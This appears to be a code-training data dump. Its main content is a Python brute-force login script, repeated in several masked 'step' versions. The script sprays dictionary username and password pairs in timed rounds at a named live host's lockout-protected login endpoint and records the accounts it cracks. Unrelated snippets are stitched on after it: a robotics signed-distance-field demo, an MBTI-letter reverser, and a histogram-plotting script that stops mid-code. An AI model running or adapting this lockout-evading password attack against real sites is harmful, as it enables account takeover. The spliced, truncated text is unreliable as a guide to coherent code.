with open('dict/{}'.format(dict_pass)) as f:
passwords = [line.strip() for line in f.readlines()]
count = 0
for u in username:
p = passwords[curr_round % len(passwords)]
count += 1
pair = u, p
dict_queue.put(pair)
print('字典生成完成,长度 {}'.format(count))
def get_parse() ->dict:
parser = argparse.ArgumentParser()
parser.add_argument('--username', '-u', help='用户名字典')
parser.add_argument('--password', '-p', help='密码字典')
dic = vars(parser.parse_args())
return dic
def print_result():
"""
打印爆破的结果
"""
success = []
while not success_queue.empty():
success.append(success_queue.get())
print('\n[INFO] 爆破结果: ', success)
if __name__ == '__main__':
args = get_parse()
dict_username = args.get('dict_username', 'username.txt')
dict_password = args.get('dict_password', 'password.txt')
for curr_round in range(0, MAX_ROUND):
print('[INFO] 开始第{0}轮爆破'.format(curr_round))
get_dict(dict_username, dict_password)
bruteforce(login_limit_user, thread_num=5)
print('[INFO] Sleep.')
sleep(2)
print_result()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
MAX_ROUND = 3
curr_round = 0
sleep_time = 2
def login_limit_user():
"""
登录函数
"""
try:
login_info = dict_queue.get(block=False)
except Exception as e:
print('[Error] {0}'.format(repr(e)))
return
username = login_info[0]
if username in success_username:
return
password = login_info[1]
payload = {'username': username, 'password': password}
print('开始尝试用户名:{},密码:{}'.format(username, password))
url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'
r = requests.post(url, data=payload)
if r.status_code == 200:
msg = login_info
success_str = '欢迎访问GentleCP的网站'
if success_str in r.text:
success_queue.put(msg)
success_username.append(username)
print('[INFO] success: ', msg)
def get_dict(dict_user, dict_pass):
"""
生成字典队列
:return:
"""
with open('dict/{}'.format(dict_user)) as f:
username = [line.strip() for line in f.readlines()]
with open('dict/{}'.format(dict_pass)) as f:
passwords = [line.strip() for line in f.readlines()]
count = 0
for u in username:
p = passwords[curr_round % len(passwords)]
count += 1
pair = u, p
dict_queue.put(pair)
print('字典生成完成,长度 {}'.format(count))
def get_parse() ->dict:
parser = argparse.ArgumentParser()
parser.add_argument('--username', '-u', help='用户名字典')
parser.add_argument('--password', '-p', help='密码字典')
dic = vars(parser.parse_args())
return dic
def print_result():
"""
打印爆破的结果
"""
success = []
while not success_queue.empty():
success.append(success_queue.get())
print('\n[INFO] 爆破结果: ', success)
if __name__ == '__main__':
args = get_parse()
dict_username = args.get('dict_username', 'username.txt')
dict_password = args.get('dict_password', 'password.txt')
for curr_round in range(0, MAX_ROUND):
print('[INFO] 开始第{0}轮爆破'.format(curr_round))
get_dict(dict_username, dict_password)
bruteforce(login_limit_user, thread_num=5)
print('[INFO] Sleep.')
sleep(2)
print_result()
<|reserved_special_token_1|>
import argparse
import requests
from ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username
from random import choice
from time import sleep
MAX_ROUND = 3
curr_round = 0
sleep_time = 2
def login_limit_user():
"""
登录函数
"""
try:
login_info = dict_queue.get(block=False)
except Exception as e:
print('[Error] {0}'.format(repr(e)))
return
username = login_info[0]
if username in success_username:
return
password = login_info[1]
payload = {'username': username, 'password': password}
print('开始尝试用户名:{},密码:{}'.format(username, password))
url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'
r = requests.post(url, data=payload)
if r.status_code == 200:
msg = login_info
success_str = '欢迎访问GentleCP的网站'
if success_str in r.text:
success_queue.put(msg)
success_username.append(username)
print('[INFO] success: ', msg)
def get_dict(dict_user, dict_pass):
"""
生成字典队列
:return:
"""
with open('dict/{}'.format(dict_user)) as f:
username = [line.strip() for line in f.readlines()]
with open('dict/{}'.format(dict_pass)) as f:
passwords = [line.strip() for line in f.readlines()]
count = 0
for u in username:
p = passwords[curr_round % len(passwords)]
count += 1
pair = u, p
dict_queue.put(pair)
print('字典生成完成,长度 {}'.format(count))
def get_parse() ->dict:
parser = argparse.ArgumentParser()
parser.add_argument('--username', '-u', help='用户名字典')
parser.add_argument('--password', '-p', help='密码字典')
dic = vars(parser.parse_args())
return dic
def print_result():
"""
打印爆破的结果
"""
success = []
while not success_queue.empty():
success.append(success_queue.get())
print('\n[INFO] 爆破结果: ', success)
if __name__ == '__main__':
args = get_parse()
dict_username = args.get('dict_username', 'username.txt')
dict_password = args.get('dict_password', 'password.txt')
for curr_round in range(0, MAX_ROUND):
print('[INFO] 开始第{0}轮爆破'.format(curr_round))
get_dict(dict_username, dict_password)
bruteforce(login_limit_user, thread_num=5)
print('[INFO] Sleep.')
sleep(2)
print_result()
<|reserved_special_token_1|>
import argparse
import requests
from ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username
from random import choice
from time import sleep
MAX_ROUND = 3 # 爆破的轮数
curr_round = 0 # 当前的轮数
sleep_time = 2 # 每一轮休眠的秒数
def login_limit_user():
"""
登录函数
"""
try:
login_info = dict_queue.get(block=False)
except Exception as e:
print("[Error] {0}".format(repr(e)))
return
username = login_info[0]
# 如果这个用户名已经被爆破出来密码,那么跳过这个用户名
if username in success_username:
return
password = login_info[1]
# 登录
payload = {
"username": username,
"password": password,
}
print('开始尝试用户名:{},密码:{}'.format(username,password))
# url = "http://127.0.0.1:8000/user/login-block-account/?referer=/"
url = "http://ss.gentlecp.com:40000/user/login-block-account/?referer=/"
r = requests.post(url, data=payload)
# 判断是否登录成功
if r.status_code == 200:
msg = login_info
success_str = "欢迎访问GentleCP的网站"
if success_str in r.text:
# 登录成功则把登录信息保存到success_queue
success_queue.put(msg)
# 把登录成功的用户名添加到 success_username中,之后可以跳过这个用户名的密码的爆破
success_username.append(username)
print("[INFO] success: ", msg)
# 如果想要爆破出来一个密码就立刻停止爆破,那么此处调用函数stop_brute,反之则注释此处
# stop_brute()
def get_dict(dict_user, dict_pass):
"""
生成字典队列
:return:
"""
with open("dict/{}".format(dict_user)) as f:
username = [line.strip() for line in f.readlines()]
with open('dict/{}'.format(dict_pass)) as f:
passwords = [line.strip() for line in f.readlines()]
count = 0
for u in username:
# 每一轮都换下一个密码
p = passwords[curr_round % len(passwords)]
count += 1
pair = (u, p)
dict_queue.put(pair)
print("字典生成完成,长度 {}".format(count))
def get_parse() -> dict:
parser = argparse.ArgumentParser()
parser.add_argument("--username", "-u", help="用户名字典")
parser.add_argument("--password", "-p", help="密码字典")
dic = vars(parser.parse_args())
return dic
def print_result():
"""
打印爆破的结果
"""
success = []
while not success_queue.empty():
success.append(success_queue.get())
print("\n[INFO] 爆破结果: ", success)
if __name__ == "__main__":
args = get_parse()
dict_username = args.get('dict_username', "username.txt")
dict_password = args.get('dict_password', "password.txt")
for curr_round in range(0, MAX_ROUND):
print("[INFO] 开始第{0}轮爆破".format(curr_round))
get_dict(dict_username, dict_password)
bruteforce(login_limit_user, thread_num=5)
print("[INFO] Sleep.")
sleep(2)
print_result()
|
flexible
|
{
"blob_id": "94286fc36e06598b9faa65d9e5759f9518e436c6",
"index": 7979,
"step-1": "<mask token>\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\nif __name__ == '__main__':\n args = get_parse()\n dict_username = args.get('dict_username', 'username.txt')\n dict_password = args.get('dict_password', 'password.txt')\n for curr_round in range(0, MAX_ROUND):\n print('[INFO] 开始第{0}轮爆破'.format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print('[INFO] Sleep.')\n sleep(2)\n print_result()\n",
"step-3": "<mask token>\nMAX_ROUND = 3\ncurr_round = 0\nsleep_time = 2\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\nif __name__ == '__main__':\n args = get_parse()\n dict_username = args.get('dict_username', 'username.txt')\n dict_password = args.get('dict_password', 'password.txt')\n for curr_round in range(0, MAX_ROUND):\n print('[INFO] 开始第{0}轮爆破'.format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print('[INFO] Sleep.')\n sleep(2)\n print_result()\n",
"step-4": "import argparse\nimport requests\nfrom ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username\nfrom random import choice\nfrom time import sleep\nMAX_ROUND = 3\ncurr_round = 0\nsleep_time = 2\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\nif __name__ == '__main__':\n args = get_parse()\n dict_username = args.get('dict_username', 'username.txt')\n dict_password = args.get('dict_password', 'password.txt')\n for curr_round in range(0, MAX_ROUND):\n print('[INFO] 开始第{0}轮爆破'.format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print('[INFO] Sleep.')\n sleep(2)\n print_result()\n",
"step-5": "import argparse\nimport requests\n\nfrom ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username\n\nfrom random import choice\nfrom time import sleep\n\n\nMAX_ROUND = 3 # 爆破的轮数\ncurr_round = 0 # 当前的轮数\nsleep_time = 2 # 每一轮休眠的秒数\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print(\"[Error] {0}\".format(repr(e)))\n return\n\n username = login_info[0]\n # 如果这个用户名已经被爆破出来密码,那么跳过这个用户名\n if username in success_username:\n return\n\n password = login_info[1]\n # 登录\n payload = {\n \"username\": username,\n \"password\": password,\n }\n print('开始尝试用户名:{},密码:{}'.format(username,password))\n\n # url = \"http://127.0.0.1:8000/user/login-block-account/?referer=/\"\n url = \"http://ss.gentlecp.com:40000/user/login-block-account/?referer=/\"\n r = requests.post(url, data=payload)\n\n # 判断是否登录成功\n if r.status_code == 200:\n msg = login_info\n\n success_str = \"欢迎访问GentleCP的网站\"\n if success_str in r.text:\n # 登录成功则把登录信息保存到success_queue\n success_queue.put(msg)\n # 把登录成功的用户名添加到 success_username中,之后可以跳过这个用户名的密码的爆破\n success_username.append(username)\n print(\"[INFO] success: \", msg)\n\n # 如果想要爆破出来一个密码就立刻停止爆破,那么此处调用函数stop_brute,反之则注释此处\n # stop_brute()\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open(\"dict/{}\".format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n\n count = 0\n for u in username:\n # 每一轮都换下一个密码\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = (u, p)\n dict_queue.put(pair)\n print(\"字典生成完成,长度 {}\".format(count))\n\n\ndef get_parse() -> dict:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--username\", \"-u\", help=\"用户名字典\")\n parser.add_argument(\"--password\", \"-p\", help=\"密码字典\")\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print(\"\\n[INFO] 爆破结果: \", success)\n\n\nif __name__ == \"__main__\":\n args = get_parse()\n dict_username = args.get('dict_username', \"username.txt\")\n dict_password = args.get('dict_password', \"password.txt\")\n\n for curr_round in range(0, MAX_ROUND):\n print(\"[INFO] 开始第{0}轮爆破\".format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print(\"[INFO] Sleep.\")\n sleep(2)\n\n print_result()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
#!/usr/bin/env python
# Copyright (c) 2018, University of Stuttgart
# All rights reserved.
#
# Permission to use, copy, modify, and distribute this software for any purpose
# with or without fee is hereby granted, provided that the above copyright
# notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
#
# Jim Mainprice on Sunday June 13 2018
import demos_common_imports
from pyrieef.geometry.workspace import *
from pyrieef.geometry.pixel_map import sdf
from pyrieef.rendering.workspace_planar import WorkspaceDrawer
env = EnvBox(dim=np.array([2., 2.]))
box = Box(origin=np.array([-.2, -.2]))
segment = Segment(origin=np.array([.4, -.1]), orientation=0.2)
circle = Circle(origin=np.array([.5, .5]), radius=0.2)
workspace = Workspace(env)
workspace.obstacles.append(box)
workspace.obstacles.append(segment)
workspace.obstacles.append(circle)
# Compute Occupancy map and SDF
nb_points = 20
occupancy_map = occupancy_map(nb_points, workspace)
signed_distance_field = sdf(occupancy_map)
# Setup viewer
viewer = WorkspaceDrawer(workspace, wait_for_keyboard=True)
viewer.draw_ws_img(signed_distance_field)
# viewer.draw_ws_img(occupancy_map)
# import cv2
# Draw blured image
# viewer.draw_ws_img(
# ndimage.gaussian_filter(
# cv2.resize(src=signed_distance_field,
# dsize=(300, 300),
# interpolation=cv2.INTER_NEAREST), sigma=3))
viewer.draw_ws_obstacles()
viewer.show_once()
|
normal
|
{
"blob_id": "0d6177660a9b9c22bcf6eb11763e7fe1ee03b46a",
"index": 3454,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nworkspace.obstacles.append(box)\nworkspace.obstacles.append(segment)\nworkspace.obstacles.append(circle)\n<mask token>\nviewer.draw_ws_img(signed_distance_field)\nviewer.draw_ws_obstacles()\nviewer.show_once()\n",
"step-3": "<mask token>\nenv = EnvBox(dim=np.array([2.0, 2.0]))\nbox = Box(origin=np.array([-0.2, -0.2]))\nsegment = Segment(origin=np.array([0.4, -0.1]), orientation=0.2)\ncircle = Circle(origin=np.array([0.5, 0.5]), radius=0.2)\nworkspace = Workspace(env)\nworkspace.obstacles.append(box)\nworkspace.obstacles.append(segment)\nworkspace.obstacles.append(circle)\nnb_points = 20\noccupancy_map = occupancy_map(nb_points, workspace)\nsigned_distance_field = sdf(occupancy_map)\nviewer = WorkspaceDrawer(workspace, wait_for_keyboard=True)\nviewer.draw_ws_img(signed_distance_field)\nviewer.draw_ws_obstacles()\nviewer.show_once()\n",
"step-4": "import demos_common_imports\nfrom pyrieef.geometry.workspace import *\nfrom pyrieef.geometry.pixel_map import sdf\nfrom pyrieef.rendering.workspace_planar import WorkspaceDrawer\nenv = EnvBox(dim=np.array([2.0, 2.0]))\nbox = Box(origin=np.array([-0.2, -0.2]))\nsegment = Segment(origin=np.array([0.4, -0.1]), orientation=0.2)\ncircle = Circle(origin=np.array([0.5, 0.5]), radius=0.2)\nworkspace = Workspace(env)\nworkspace.obstacles.append(box)\nworkspace.obstacles.append(segment)\nworkspace.obstacles.append(circle)\nnb_points = 20\noccupancy_map = occupancy_map(nb_points, workspace)\nsigned_distance_field = sdf(occupancy_map)\nviewer = WorkspaceDrawer(workspace, wait_for_keyboard=True)\nviewer.draw_ws_img(signed_distance_field)\nviewer.draw_ws_obstacles()\nviewer.show_once()\n",
"step-5": "#!/usr/bin/env python\n\n# Copyright (c) 2018, University of Stuttgart\n# All rights reserved.\n#\n# Permission to use, copy, modify, and distribute this software for any purpose\n# with or without fee is hereby granted, provided that the above copyright\n# notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH\n# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY\n# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,\n# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM\n# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR\n# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR\n# PERFORMANCE OF THIS SOFTWARE.\n#\n# Jim Mainprice on Sunday June 13 2018\n\nimport demos_common_imports\nfrom pyrieef.geometry.workspace import *\nfrom pyrieef.geometry.pixel_map import sdf\nfrom pyrieef.rendering.workspace_planar import WorkspaceDrawer\n\nenv = EnvBox(dim=np.array([2., 2.]))\nbox = Box(origin=np.array([-.2, -.2]))\nsegment = Segment(origin=np.array([.4, -.1]), orientation=0.2)\ncircle = Circle(origin=np.array([.5, .5]), radius=0.2)\nworkspace = Workspace(env)\nworkspace.obstacles.append(box)\nworkspace.obstacles.append(segment)\nworkspace.obstacles.append(circle)\n\n# Compute Occupancy map and SDF\nnb_points = 20\noccupancy_map = occupancy_map(nb_points, workspace)\nsigned_distance_field = sdf(occupancy_map)\n\n# Setup viewer\nviewer = WorkspaceDrawer(workspace, wait_for_keyboard=True)\nviewer.draw_ws_img(signed_distance_field)\n# viewer.draw_ws_img(occupancy_map)\n\n# import cv2\n# Draw blured image\n# viewer.draw_ws_img(\n# ndimage.gaussian_filter(\n# cv2.resize(src=signed_distance_field,\n# dsize=(300, 300),\n# interpolation=cv2.INTER_NEAREST), sigma=3))\n\nviewer.draw_ws_obstacles()\nviewer.show_once()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in yeongil_MBTI:
print(MBTI_reverse_index[i], end='')
<|reserved_special_token_1|>
MBTI_reverse_index = {'E': 'I', 'I': 'E', 'S': 'N', 'N': 'S', 'T': 'F', 'F':
'T', 'J': 'P', 'P': 'J'}
yeongil_MBTI = input()
for i in yeongil_MBTI:
print(MBTI_reverse_index[i], end='')
<|reserved_special_token_1|>
# https://www.acmicpc.net/problem/20540
# 각 지표의 반대되는 지표를 저장한 dictionary
MBTI_reverse_index = {
'E': 'I',
'I': 'E',
'S': 'N',
'N': 'S',
'T': 'F',
'F': 'T',
'J': 'P',
'P': 'J'
}
# 연길이의 MBTI 4글자를 대문자로 입력
yeongil_MBTI = input()
# 연길이 MBTI의 각 지표에 반대되는 지표를 출력
for i in yeongil_MBTI:
print(MBTI_reverse_index[i], end='')
|
flexible
|
{
"blob_id": "c247b218267fc7c2bee93053dd90b2806572eaf2",
"index": 4234,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in yeongil_MBTI:\n print(MBTI_reverse_index[i], end='')\n",
"step-3": "MBTI_reverse_index = {'E': 'I', 'I': 'E', 'S': 'N', 'N': 'S', 'T': 'F', 'F':\n 'T', 'J': 'P', 'P': 'J'}\nyeongil_MBTI = input()\nfor i in yeongil_MBTI:\n print(MBTI_reverse_index[i], end='')\n",
"step-4": "# https://www.acmicpc.net/problem/20540\n\n# 각 지표의 반대되는 지표를 저장한 dictionary\nMBTI_reverse_index = {\n 'E': 'I',\n 'I': 'E',\n 'S': 'N',\n 'N': 'S',\n 'T': 'F',\n 'F': 'T',\n 'J': 'P',\n 'P': 'J'\n}\n\n# 연길이의 MBTI 4글자를 대문자로 입력\nyeongil_MBTI = input()\n\n# 연길이 MBTI의 각 지표에 반대되는 지표를 출력\nfor i in yeongil_MBTI:\n print(MBTI_reverse_index[i], end='')",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# dg_kernel plots
import os
import re
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
import csv
import sys
NE_SIZE = 128
TITLE_SIZE = 35
TEXT_SIZE = 30
MARKER_SIZE = 10
LINE_WIDTH = 5
colors = { idx:cname for idx, cname in enumerate(mcolors.cnames) }
eventname = 'L1_DCM'
callstacklevel = 7
FREQ_THRESHOLD = 0.02
ROOT = '/global/homes/g/grnydawn/trepo/temp/cylcworkspace/extrae_HSW/cgroup/folding/02242017_1353/codeline'
# read histogram file
def read_histogram(histofile):
histodict = {}
with open(histofile, 'rb') as f:
reader = csv.reader(f, delimiter='\t')
try:
exclude_item = []
for i, row in enumerate(reader):
if len(row)<1: continue
if i==0:
name = []
for j, item in enumerate(row[1:]):
if len(item)<1:
exclude_item += [ j ]
continue
name += [ item ]
histodict['Head'] = name
else:
numval = []
for j, item in enumerate(row[1:]):
if j in exclude_item: continue
try:
numval += [ float(item) ]
except Exception as e:
if len(item)<1:
numval += [ 0.0 ]
else:
print e
histodict[row[0]] = numval
except csv.Error as e:
sys.exit('file %s, line %d: %s' % (histofile, reader.line_num, e))
return histodict
def draw_histogram(xname, yval, title, xlabel, ylabel, filename, xrange=None):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_title(title, fontsize=TITLE_SIZE)
ax.set_xlabel(xlabel, fontsize=TEXT_SIZE)
ax.set_ylabel(ylabel, fontsize=TEXT_SIZE)
if xrange: XL = xrange
else: XL = [0, len(xname)]
ax.set_xticks(range(len(xname)))
newname = []
for i, xn in enumerate(xname):
if i%1==0:
newname += [ xn ]
else:
newname += [ "" ]
ax.set_xticklabels(newname)
xval = np.arange(len(xname))[XL[0]:XL[1]]
yval = yval[XL[0]:XL[1]]
YL = [0, max(yval)*1.5]
ax.axis(XL + YL)
gridlines = ax.get_xaxis().get_gridlines()
for gl in gridlines:
gl.set_visible(False)
ax.grid(b=True, which='major', color='b', linestyle='-', linewidth=0.5)
ax.grid(b=False, which='minor', color='#888888', linestyle='-',linewidth=0.5)
ax.grid(True)
for label in ax.xaxis.get_ticklabels(): label.set_fontsize(TEXT_SIZE)
#for label in ax.xaxis.get_ticklabels(): label.set_fontsize(20)
for label in ax.yaxis.get_ticklabels(): label.set_fontsize(TEXT_SIZE)
fnamelist = list(set(filename))
clist = []
for fname in filename:
color = colors[fnamelist.index(fname)]
clist += [ color ]
width = (XL[1]-XL[0])/float(len(xval)*2)
histo = ax.bar(xval-width/2, yval, width, color=clist)
dummy_bars = []
for i, fname in enumerate(fnamelist):
dummy_bars += ax.bar([0], [1.E-16], width, color=colors[i])
ax.legend(dummy_bars, fnamelist, loc=2)
#plt.savefig("./dgomp.png")
plt.show()
peak1 = read_histogram('%s/%s_high_linelevel%d_region0.csv'%(ROOT, eventname, callstacklevel))
peak2 = read_histogram('%s/%s_high_linelevel%d_region1.csv'%(ROOT, eventname, callstacklevel))
peaks_avgsum = sum(peak1['Average']) + sum(peak2['Average'])
#print 'peaks_avgsum = ', peaks_avgsum
peaks_normavg = {}
for i, line in enumerate(peak1['Head']):
if peaks_normavg.has_key(line):
peaks_normavg[line] += peak1['Average'][i]
else:
peaks_normavg[line] = peak1['Average'][i]
for i, line in enumerate(peak2['Head']):
if peaks_normavg.has_key(line):
peaks_normavg[line] += peak2['Average'][i]
else:
peaks_normavg[line] = peak2['Average'][i]
#print 'peaks_normavg before = ', peaks_normavg.values()[:30]
for line in peaks_normavg.keys():
peaks_normavg[line] = peaks_normavg[line]/peaks_avgsum
#print 'peaks_normavg after = ', peaks_normavg.values()[:30]
nonpeak1 = read_histogram('%s/%s_low_linelevel%d_region0.csv'%(ROOT, eventname, callstacklevel))
nonpeak2 = read_histogram('%s/%s_low_linelevel%d_region1.csv'%(ROOT, eventname, callstacklevel))
nonpeaks_avgsum = sum(nonpeak1['Average']) + sum(nonpeak2['Average'])
nonpeaks_normavg = {}
for i, line in enumerate(nonpeak1['Head']):
if nonpeaks_normavg.has_key(line):
nonpeaks_normavg[line] += nonpeak1['Average'][i]
else:
nonpeaks_normavg[line] = nonpeak1['Average'][i]
for i, line in enumerate(nonpeak2['Head']):
if nonpeaks_normavg.has_key(line):
nonpeaks_normavg[line] += nonpeak2['Average'][i]
else:
nonpeaks_normavg[line] = nonpeak2['Average'][i]
#print 'nonpeaks_normavg before = ', nonpeaks_normavg.values()[:30]
for line in nonpeaks_normavg.keys():
nonpeaks_normavg[line] = nonpeaks_normavg[line]/nonpeaks_avgsum
#print 'nonpeaks_normavg after = ', nonpeaks_normavg.values()[:30]
#import pdb; pdb.set_trace()
result = {}
